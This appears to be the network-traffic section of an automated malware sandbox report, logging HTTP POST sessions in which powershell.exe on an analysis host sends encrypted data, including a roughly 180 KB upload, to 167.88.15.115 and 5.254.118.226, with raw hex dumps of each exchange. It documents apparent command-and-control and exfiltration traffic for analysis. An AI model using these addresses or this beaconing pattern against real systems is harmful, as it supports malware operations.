6d b8 79 9d 5d e2 61 0f 88 b8 62 5a f2 0b 6a f5 ca 4c a3 5e c8 a0 28 8a 8a ae 6f 32 b6 e0 a9 fe 16 7d ea 4b 79 79 15 07 02 4a 47 2c 3b 69 5a 32 de e9 dd 3c 8a 61 bd Data Ascii: lW)ZXe 4=`i(o)n<C_{w+u!Txn:vkh-MCZq<ER6B!IDJ!"iT-3c5e5S}qakI7z5Cm"nT6>$CmROM~jg%0-h;W?my]abZjL^(o2}KyyJG,;iZ2<a
Aug 28, 2021 00:06:52.930071115 CEST	6452	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 629
Aug 28, 2021 00:06:53.456080914 CEST	6456	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 307 Connection: keep-alive Data Raw: a5 c1 fb 2c 5f ba 3b 95 be 17 27 f7 0c 6e f3 d8 fb 2e 38 37 41 b4 37 30 b1 06 b6 28 07 24 67 83 7c 02 3f 08 4b c8 c8 a5 a5 78 ec 7e 05 fc ff 20 94 23 df 64 f2 cc 85 fe 15 8d 2f de 1d 28 26 a0 15 f8 2e 8b 0d 9d 5e 22 c3 8d 84 42 e8 04 c1 c7 d8 48 a2 87 58 73 68 47 77 27 f7 c2 31 1f 79 a2 72 d8 59 77 bd 4b 0e 6c 2c 02 a4 47 6e e7 9e 41 cc 04 1a 03 de 44 38 e2 68 6a da 8d d4 05 b0 fc f5 47 de 26 23 6d ff 88 a8 4a fa 3f ba 05 ee 61 d5 b9 5e 46 c2 37 48 b3 07 b1 ab aa 73 c0 3d 1a cc d1 8d 0d 68 76 57 7c 87 df cd a2 51 49 d9 d9 8b 37 b2 10 d1 c7 b8 92 1c 57 3a 5a e2 e1 29 e3 98 bc 60 41 65 ab 1d c5 5a 17 50 f4 8e d1 f4 cb 26 5e 40 ca fb 38 12 66 f7 6a 9a 4f 5d aa 9f 54 a6 84 00 81 45 21 b9 2e f7 9e c5 c4 ee b6 35 76 5e 96 82 0f 78 1b ff 95 9d 72 87 65 37 b4 0d 3d a5 7e 15 33 32 ea c3 da 28 75 79 ca a2 42 57 a1 50 c2 f0 fc a0 5d 15 70 8f 2c d2 8b ee 02 8c 22 e1 3b 16 8b 5a bd 22 c9 7b 0b 5f 8d 8b 52 b5 ff b1 9c b2 Data Ascii: ,_;'n.87A70($g\|?Kx~ #d/(&.^"BHXshGw'1yrYwKl,GnAD8hjG&#mJ?a^F7Hs=hvW\|QI7W:Z)`AeZP&^@8fjO]TE!.5v^xre7=~32(uyBWP]p,";Z"{_R
Aug 28, 2021 00:06:53.570446968 CEST	6456	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 483
Aug 28, 2021 00:06:54.089286089 CEST	6459	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 128 Connection: keep-alive Data Raw: a4 df fd 30 02 06 7f 76 82 d9 e0 7e 96 60 45 71 61 c2 93 f0 87 d9 10 87 7c 54 18 4d 8b be ce b1 8d 16 c0 fb ef bd b7 c1 2c f2 73 8d a0 6b fc 00 54 92 64 ac 93 ba 61 d7 ea f1 ca 48 df 23 b5 65 33 c2 ce 8b 85 bb 20 49 e4 91 be 5f 2a 5d c2 78 a1 36 46 ee e9 0d 1d e2 f9 14 db 13 b0 8f 51 76 9b 5a 9a 70 29 91 a0 df 1d 73 fb d5 f4 7c 2c 48 e5 00 b3 d6 5c 12 05 79 aa 66 4c aa 0e 6b b0 ff Data Ascii: 0v~`Eqa\|TM,skTdaH#e3 I_*]x6FQvZp)s\|,H\yfLk
Aug 28, 2021 00:06:54.212527990 CEST	6460	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 319
Aug 28, 2021 00:06:54.740906000 CEST	6462	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 173 Connection: keep-alive Data Raw: 83 94 bc 0c a3 74 23 47 da b7 fd 7e 01 30 66 9c db 03 76 08 a3 3f 13 41 d3 b9 7f c4 27 56 0c d5 e1 9f 64 c6 f0 82 43 87 fd 5c 0b f0 ff 3c 3c 05 f3 de 3e 78 14 48 bd 86 78 8a 98 ec 6d 40 ab 8b 0d 96 94 18 96 d3 b9 51 0e 6c 61 97 fa 60 b7 57 c0 05 cf 0b 1a d1 25 b0 bc ac 84 08 00 42 6d 64 59 26 c2 df 5d 50 a0 9b 39 a1 78 af d4 a1 68 62 39 73 b4 98 d6 14 6a e6 74 97 ce 77 03 a0 2c 46 cf 8e df ea 7f 9a b3 e7 1a 50 4f 71 be 6d 14 8b 67 2b 36 ef e3 10 40 8d 65 8a 6d f6 52 37 f5 d9 06 63 e2 2f 5a eb ea 13 13 3a cb 28 11 Data Ascii: t#G~0fv?A'VdC\<<>xHxm@Qla`W%BmdY&]P9xhb9sjtw,FPOqmg+6@emR7c/Z:(
Aug 28, 2021 00:06:54.851815939 CEST	6463	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 392
Aug 28, 2021 00:06:55.378901005 CEST	6465	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 285 Connection: keep-alive Data Raw: 65 58 1a 21 9e 40 f6 da 37 4e 9f 25 d6 6c ef 75 f4 88 49 96 9d 94 80 98 9f 5e 78 dc 1f e9 c8 de f0 9d 1d 6c 57 ce e9 0c c9 e7 fa 37 31 89 26 d1 1e 30 a1 de 03 5e af c3 d3 2e 40 78 18 84 30 04 41 4a bb d7 fb 4f f3 dc 0d 25 9b d3 d6 0a c0 6e ac 73 b1 81 af 9e 26 a8 9b 10 60 4e ab 7e 23 13 29 7b 32 02 93 a8 ba e2 3d 40 2a df 22 46 56 3f da 58 eb e4 87 83 c0 77 91 74 85 2f 13 63 fe 32 74 09 c9 15 56 cd e0 cb 3c f8 b5 c5 78 04 4a 32 01 5d b9 a5 5b 43 c9 4a 18 9a bf 0d 43 47 58 34 8d f0 b0 44 9a 26 43 e1 69 ce 08 05 a6 75 31 e0 8c 31 e5 85 10 b0 82 2f 9b ef c8 e8 65 85 b3 03 d2 8a 9c e6 b9 38 b3 ac 0c 5b 97 dd 00 9e e2 7e 82 50 8e da 8e 8e c4 fb 15 f0 9a 03 96 75 cf b3 7c b1 cc a7 67 6f e3 bb 92 d2 40 0d 85 77 b8 23 43 93 1d 2a 66 47 6b c1 c0 45 07 47 92 14 7d 2d ee ac 35 e7 f6 02 52 12 dd e5 e4 8a ae 4d fd d6 ba 40 09 c6 6f 12 ff 85 a1 3b 80 32 3e Data Ascii: eX!@7N%luI^xlW71&0^.@x0AJO%ns&`N~#){2=@"FV?Xwt/c2tV<xJ2][CJCGX4D&Ciu11/e8[~Pu\|go@w#CfGkEG}-5RM@o;2>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49729	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:06:50.270347118 CEST	6437	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 649
Aug 28, 2021 00:06:50.430255890 CEST	6438	OUT	Data Raw: 56 40 4b fe d4 66 09 72 b2 aa d4 8a b7 7e 5d d9 22 68 e9 dc 96 02 a9 31 24 b6 7c 7c 1b 0b a6 76 9f 50 ca d8 30 2a 3f ec ee 82 2c e3 69 61 0a 31 ac e3 b8 49 aa e0 2e 54 96 1b da 1e e9 8b 57 a8 05 5f e9 68 b3 84 a9 f7 2a fc ed 15 d5 c4 c6 c1 ad 4b Data Ascii: V@Kfr~]"h1$\|\|vP0?,ia1I.TW_hK7R^#vCN"d+w}):}So W+E=ASK?q5d,:vM\@h/+b$hu^:DuV(FVz(kd-fPf"PAPCSK@_vJN
Aug 28, 2021 00:06:50.766411066 CEST	6440	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 260 Connection: keep-alive Data Raw: 09 d5 c6 3d 2b 17 da b1 1f bb be 70 64 d6 75 53 36 ac 44 38 6b 4e b9 6d f5 ff 34 c8 fa 17 7d ee c5 96 e1 ed ef bd 37 a1 3d 47 53 64 e7 34 3d 29 70 4f ae fd da d8 93 18 16 d1 85 23 86 d5 77 95 2d d8 3d a1 33 f8 c7 70 93 cd a2 66 2c 61 23 85 4e d9 2f a6 4a e5 e5 df 73 f3 52 ae c1 4e 6f be 43 65 f8 c8 f4 37 a4 60 3f be 89 2b d9 9c ef 1e 30 db 8b a5 7d cb bf 87 95 4b 4b 64 c5 6d 32 73 07 11 29 90 84 5b d8 a6 5d 94 20 bd f9 0c 38 64 8f d6 82 b7 56 62 91 fd b0 4b 4a 90 36 b1 58 40 04 49 5c cf f3 34 33 8b 49 15 5a 4a 52 ec 7a 75 2f 65 16 c4 a2 24 94 3d 9d d5 c5 47 34 e4 1c c3 c9 0a d3 a1 c8 41 1c 75 8e 53 2a c9 e0 36 db cd a7 e0 f3 69 df 58 a4 f0 79 77 a3 d8 b5 44 01 20 b7 c2 aa 00 70 a4 63 d7 6f 6b 00 20 31 23 64 78 4d 4a 7a 0f 34 af b8 fe 05 ad 17 fd 4e f0 8f 52 93 4d 06 b9 Data Ascii: =+pduS6D8kNm4}7=GSd4=)pO#w-=3pf,a#N/JsRNoCe7`?+0}KKdm2s)[] 8dVbKJ6X@I\43IZJRzu/e$=G4AuS*6iXywD pcok 1#dxMJz4NRM

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49730	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:06:58.090368032 CEST	6467	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180752
Aug 28, 2021 00:06:58.090511084 CEST	6479	OUT	Data Raw: cb cf 84 b2 6b d9 cd 49 0c 01 39 97 44 10 2c 32 d3 fd b6 f7 ac 3a 1f 1b 8b 1e 3f f0 8a e8 88 ca 5c 95 e9 f4 17 50 83 b4 61 35 9d f4 38 c8 44 cc e2 88 08 f7 4f b0 ad 92 b1 6a 27 4e 9b db be 22 78 6d 3b ae 26 36 1b 84 7a 03 96 78 9b 29 e2 c2 d8 72 Data Ascii: kI9D,2:?\Pa58DOj'N"xm;&6zx)r\|WD6v\|\|n~M6ct@m[D5Ca^/`&<):d4n/2^l*m7GgLL^Qsoi9s{@c5q!_}
Aug 28, 2021 00:06:58.157701969 CEST	6481	OUT	Data Raw: 83 0d db ac ff fe 48 68 2c 6b 98 3e e0 58 42 33 d5 2c f9 d5 bd 4c c6 ed a8 33 f3 b5 66 9e 30 cb 34 9f 1b 54 76 6d 03 5f 28 bc 48 14 1c bd 80 b7 d0 cb f3 2e d0 b0 5d 8b 88 c0 2b da 85 27 b0 ab 5f de ba 2c 3e f0 13 a5 16 30 46 e8 be c0 68 25 63 f9 Data Ascii: Hh,k>XB3,L3f04Tvm_(H.]+'_,>0Fh%c=E@K-?ON6}Wt]q:Gu`\|N{=Ph480S[-T!*[x\|FZv9s~9U{]x&rb~a&cY}J:+)\e@
Aug 28, 2021 00:06:58.157754898 CEST	6483	OUT	Data Raw: b4 41 fc 9c 03 34 3d 9f 07 e7 d4 6b c2 e2 26 0c 4a 71 2a a8 3a de dd 41 be ff bc 31 c0 5b 98 6b aa 09 ef 44 71 e8 16 1e e7 ba 18 e4 78 eb 88 be c9 4e 3d 26 11 a2 bb f1 a9 b5 fe fe 7e 7f 26 18 a8 6d 04 2e 5a 44 dc ec 0f 08 29 f4 44 50 c9 77 06 c1 Data Ascii: A4=k&Jq:A1[kDqxN=&~&m.ZD)DPwW 10YC%\|K~@]I3k00oA-e?w{B7f\7njh#HeK3~M8di4nA/,/v03!psk`)GISaB
Aug 28, 2021 00:06:58.157783031 CEST	6489	OUT	Data Raw: cf 1f b9 56 09 45 48 df e4 98 b7 8f bf ef 12 7e ff 1e 59 3f a3 47 46 5e b9 71 82 94 cb ec 68 60 f3 df b7 2e 5b c4 6c 7f 99 76 e4 3c f2 65 8b 63 4b a8 5c 6b 96 43 3f e5 05 d3 d1 c0 3b 65 48 46 df f1 47 1e 9b 67 99 6f d9 02 11 a0 ba 85 7b b6 9a e7 Data Ascii: VEH~Y?GF^qh`.[lv<ecK\kC?;eHFGgo{..I!Y2&\Ghg+&vC%b 8T,Yh2!dh8vmjKU\N2Isfn>;;sN:UVyGPu{)']
Aug 28, 2021 00:06:58.157808065 CEST	6494	OUT	Data Raw: 97 1a 5b 39 47 5d 1d fb db fa 4c 06 be 0d fb a7 e3 49 2b 34 73 5d 8e b8 c6 1d 0b 48 94 47 6f 2d 8b 84 70 42 75 92 be 00 73 ae 7f 8e 85 aa dd a9 50 16 5f ef 38 84 67 86 c4 29 7f ca 7e 15 e8 2a b8 5c ea ee e6 d5 49 7f 2e 29 3f 46 4b b2 ab e0 51 93 Data Ascii: [9G]LI+4s]HGo-pBusP_8g)~\I.)?FKQGpY>Fs;}m}hVnMH;-<Hg@8aR$m?~aaR[r$7^Kb9>_\|d9s^asYrQfDB8D(W.3'Z5O]
Aug 28, 2021 00:06:58.158251047 CEST	6497	OUT	Data Raw: ab 79 b6 42 5e 68 01 05 d2 0e 3b 9f f6 98 eb 2c ff b8 44 c1 a6 f1 68 f9 21 bb fe 39 59 7d 60 f2 25 85 6f 63 7c b6 7e c1 ec 92 48 ab 36 7f 8d 8f ab cc 74 08 1e 31 fa be bc a3 fb 8c f7 72 3d cd 9c 87 e3 5b 4c 76 ca 55 be c2 46 69 bb 23 9a 24 5f 59 Data Ascii: yB^h;,Dh!9Y}`%oc\|~H6t1r=[LvUFi#$_YRC2gQ4KG=3oydF=oz&:YlGw1lLtOs9dp P;o6v"X~{/7[<W]z.Y
Aug 28, 2021 00:06:58.158801079 CEST	6499	OUT	Data Raw: cd 1e c2 96 1f c7 b1 8e f9 90 31 5e 58 ed e8 5a e2 3d ab 5e 13 26 d4 e1 90 7f be 5a f4 2a f0 3d 98 c3 8b aa 14 ab e3 9f 8c 38 66 1f 64 6f 8d df 0d fe fa 2e 57 fc 5e 23 01 d3 2b 35 52 6d 7e e9 7e 41 77 3c 2d 3e 68 1d f9 1a f7 02 80 2c b6 ff ee 9a Data Ascii: 1^XZ=^&Z=8fdo.W^#+5Rm~~Aw<->h,L>":}\|Pyyk\|,z3Lvt%7AB4ESzRWusN1JssNM1ElK^B>2F76}=OlMbBGv9C!ead+b89@]x5
Aug 28, 2021 00:06:58.159348965 CEST	6502	OUT	Data Raw: 4c 8f fd 22 cc dc f6 1c 19 64 9c 97 98 16 a8 5e cb f0 0d b4 b9 25 22 0d c6 1b 98 be 32 71 24 d3 a8 81 d1 25 4e ed 83 67 52 e5 73 f3 f8 b4 bf f7 2f 7e 44 9b f0 31 66 2b 01 67 86 53 42 ca e9 d3 64 18 9a e8 c6 be 39 a4 f7 5f ce 0b 70 fc ba c0 7a ce Data Ascii: L"d^%"2q$%NgRs/~D1f+gSBd9_pziWwGTd*DUW(U[ FrX5R,rqK<j1Ocp=pkO-/"S,pgpL 1?%L(A(e3j8Q3MW67sX93`5T
Aug 28, 2021 00:06:58.160110950 CEST	6505	OUT	Data Raw: 7f e0 ee bb aa 2f 6b e8 a1 3f a3 60 82 73 a9 08 68 e8 d7 d2 8c a3 a0 c5 d8 03 9b f0 d5 ad d9 ec c2 a2 1a ab 47 66 ea e6 c3 96 84 5f 8b de a2 64 05 98 9a 92 21 b1 90 e3 9b 8a 4d ef ed e6 22 7d c1 d3 27 3e 3c 11 33 1e b3 76 ab 33 ec 03 75 b1 d6 35 Data Ascii: /k?`shGf_d!M"}'><3v3u5`1\'\7`$ZE>zpV5+6DJ:6=@+%m>P.&.C"pCcLExr8 Ork7HL5Pvg
Aug 28, 2021 00:06:58.260643005 CEST	6513	OUT	Data Raw: 9b 79 d8 96 16 5f ed 40 ce be b6 02 d1 3a 7b 29 b9 55 24 e5 b5 5f 0b 04 11 09 1e 5e 70 de aa b7 86 c3 16 2e 5a c0 37 2f 41 7b 56 7c 7d 00 07 83 aa 47 8c f3 dc 27 36 e6 5b 74 6f 6a 2b 51 06 a9 f2 06 94 42 18 69 34 fe 62 b1 14 91 32 13 7d 47 18 fa Data Ascii: y_@:{)U$_^p.Z7/A{V\|}G'6[toj+QBi4b2}GM"wKO5fEtvz-LK,0YJ0@ hFQ.j w PI>Zd7(}0?**y?/-8]8GI@a"aNJ#OVJ^QC.Zeyk
Aug 28, 2021 00:07:03.427900076 CEST	6920	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/html Content-Length: 193 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body bgcolor="white"><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49731	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:06:59.503595114 CEST	6579	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 709 Connection: Keep-Alive
Aug 28, 2021 00:06:59.568391085 CEST	6581	OUT	Data Raw: 58 97 9e 7c 1f d1 2d 3b 81 d7 e6 26 be 39 3f 38 8c 0e 20 c8 9e d7 4d e5 db f0 6a 4d df f8 e0 2e 9c 87 d8 9e 47 18 d7 17 01 a4 b9 40 66 23 4b 28 b7 e1 b6 ca bf 37 44 7f 4b b7 9f 2d 68 df 5b 88 f5 b9 89 37 5f a0 ef 74 35 0a c8 f8 1f 0d 80 b9 a6 42 Data Ascii: X\|-;&9?8 MjM.G@f#K(7DK-h[7_t5BCneDYTw!J2JBnJa>7&K\FK%Ma[!y~X&i`u!E[t{bOE_-8kcYsr~t]2^2H's#62$ZN

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49732	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:06:59.634000063 CEST	6584	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 268 Connection: Keep-Alive
Aug 28, 2021 00:06:59.698995113 CEST	6589	OUT	Data Raw: 6c 73 80 b1 77 8c 68 8d 22 fb 35 00 52 50 84 77 71 d6 3a fe 3e bb a0 59 41 8a 5a 84 b1 e2 e2 41 3a 3e 63 6b ec cd ab aa cb a3 a2 bc 2d 48 50 91 b3 a5 dc 55 f3 bb 51 b0 31 11 cd 7a ec d2 34 ac de 25 b8 a3 ef 6f f3 87 8f 31 21 b0 54 cb 62 06 85 25 Data Ascii: lswh"5RPwq:>YAZA:>ck-HPUQ1z4%o1!Tb%[22A]TN@bL]AVJ->PN+1!c>G'\|M0d59kHjJG11dW4Qykx[f\|1(;lPLt&X,6fDVW_?~_
Aug 28, 2021 00:06:59.763271093 CEST	6595	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/html Content-Length: 193 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body bgcolor="white"><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49733	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:06:59.829972982 CEST	6599	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 379
Aug 28, 2021 00:06:59.894705057 CEST	6604	OUT	Data Raw: 95 db a0 92 c1 c8 b9 ce 75 7e f9 a1 63 cf 17 19 e7 ed 21 5e 17 47 e1 0d d2 f1 a5 e4 09 11 47 14 d4 10 11 51 ce 43 16 e3 21 4f d7 2f 40 ba 6e 33 12 fc 8b 2c 91 e3 26 4e f8 94 bf ce 24 d3 c6 64 37 e6 cb 54 bf c5 49 a4 d8 3d 3e c7 6f b2 cb 19 83 72 Data Ascii: u~c!^GGQC!O/@n3,&N$d7TI=>orX:FLsXsLRU^FKfh\#5s2{ea/~KV]W@vk-hr(k641L3QUvAJhq?9.448z

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49734	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:00.144823074 CEST	6607	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 377

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49735	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:00.320847034 CEST	6615	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 488
Aug 28, 2021 00:07:00.392662048 CEST	6621	OUT	Data Raw: 4b 5a 5a 51 b4 cf 91 aa d4 da 56 5c 84 cb 5a 47 e7 77 ba cc c1 c7 8e 0d 6b d3 73 01 b6 a7 fa 24 5e a5 ba 7d 8e e2 fb bd 0a 62 6d cc 91 d6 44 0c 27 15 e4 8c 6f 02 b1 83 ca 4d e5 df 5d 90 f3 2e df 33 fc dd 11 db b7 05 7b fc c2 60 5b c0 7b 93 90 67 Data Ascii: KZZQV\ZGwks$^}bmD'oM].3{`[{go]8Baym?^fK\q>Q(RPRkq~*u_J+lF^C pk\|:\|#"_7%)<F\2HW=Jl_n,DqJi6Y\| lxv@g9V-A+}
Aug 28, 2021 00:07:00.471616030 CEST	6627	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/html Content-Length: 193 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>500 Internal Server Error</title></head><body bgcolor="white"><center><h1>500 Internal Server Error</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49736	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:00.627933025 CEST	6632	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 570

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49737	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:00.808231115 CEST	6632	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 413

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49738	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:00.962119102 CEST	6637	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 424
Aug 28, 2021 00:07:01.038507938 CEST	6637	OUT	Data Raw: 60 67 2b b7 df 05 26 f7 34 1a c5 04 fe 7a aa b9 54 d1 ed f7 05 1d 7d de b2 ef 9e 0f f2 4c d2 e5 70 79 83 76 66 a9 f1 d4 20 21 f5 c2 0f eb 4e aa de 8c ca 66 06 5a 4f 43 e9 4c 06 ee 66 18 06 e7 47 df 93 86 f6 34 53 aa de 19 d8 e3 27 b9 cf c6 a1 f2 Data Ascii: `g+&4zT}Lpyvf !NfZOCLfG4S'/fm@o\|/Y9!k0{?Nrg\|\9>n@-`#\e {/kDv_jMVKq!/Bl}7'l"VnHnJjv%!B
Aug 28, 2021 00:07:01.370557070 CEST	6682	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 53 Connection: keep-alive Data Raw: c0 48 f2 21 16 1a 8e b1 0e ac 54 e6 a0 cd e1 8a b9 cf 6b f7 00 6b c5 72 17 ce f5 c2 2f 6c da f8 b4 1b 95 22 03 b2 1a f2 8a fe 7c 10 3a be 7e 8c af b6 41 de 81 Data Ascii: H!Tkkr/l"\|:~A

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49716	167.88.15.115	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:05:57.457129002 CEST	1577	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 586 Connection: Keep-Alive
Aug 28, 2021 00:05:57.581892967 CEST	1578	OUT	Data Raw: 2f 96 ef 7c 15 f0 11 cb ef 16 f8 14 eb 84 4c 97 0e a6 ac b2 e6 c3 b5 b1 17 35 33 bd da 96 85 80 80 26 60 93 18 fe 52 10 6d 0d 6a cc ed dc 9b f5 a3 2e b7 ab 4c 70 bc 6a df 3e 65 df be 52 f0 5a 8f 79 92 c5 24 b7 7f 0f 55 9d 45 da 5a e8 c3 3a 98 3c Data Ascii: /\|L53&`Rmj.Lpj>eRZy$UEZ:<4hqQ=uJW,z,G9D{E]/tM+JOi.5_n+0x5sb"J,=DF5JGGH'(KG#er32NQp*Z/7$9TLF'q-pWg
Aug 28, 2021 00:05:58.037547112 CEST	1592	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 284 Connection: keep-alive Data Raw: de 55 ad 89 9e 7a 8f 64 78 cc 39 bb 01 f3 c6 38 e5 36 81 63 51 ca ce 97 56 6a 8b ec e3 b1 1f ce aa ff 38 60 65 ea 55 56 d1 1b 08 d9 a9 86 84 15 7e 1f 1e f4 c3 e9 14 e6 73 1c e2 2d bd 33 c6 f9 6b c4 ad 86 a1 e9 c1 f6 e6 23 64 ea 85 16 ce e9 24 8d 38 2d ea 33 e3 f5 7c d4 87 49 d9 64 fa 60 36 73 50 c7 77 ee 9c f1 07 41 88 8a 92 9d b8 fd 72 43 04 8c 23 1e 32 e7 c8 f5 9e 41 93 2b 0b 17 86 4a 23 b7 b6 a8 cb 70 f7 a1 71 f6 51 a9 aa f5 9d 79 a9 f9 3a 8f 0c 4b 5f f5 92 e8 c9 8e de 92 40 18 db 04 f1 c2 cf eb 61 85 53 c5 19 23 5b 07 c7 ac 8c 6a 18 3e 45 c5 d5 1b 44 7d 20 f7 4f 36 ae 0a 0b 93 25 18 39 73 80 12 e1 cb da c5 30 52 55 cb 56 3b 4f 03 37 48 3f ed 43 c6 71 c0 46 08 0c 3e f0 21 45 f5 5f 63 be 1d 13 6a ee 2e d1 4d fa 16 44 f5 a6 47 0d dd c3 03 28 00 67 de 76 5e 9e a9 67 4f 5b da 33 02 a7 fc 40 e4 b2 9a 76 10 1d b3 55 85 e8 13 00 28 b9 76 dd 0d Data Ascii: Uzdx986cQVj8`eUV~s-3k#d$8-3\|Id`6sPwArC#2A+J#pqQy:K_@aS#[j>ED} O6%9s0RUV;O7H?CqF>!E_cj.MDG(gv^gO[3@vU(v
Aug 28, 2021 00:05:58.043174028 CEST	1592	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 729
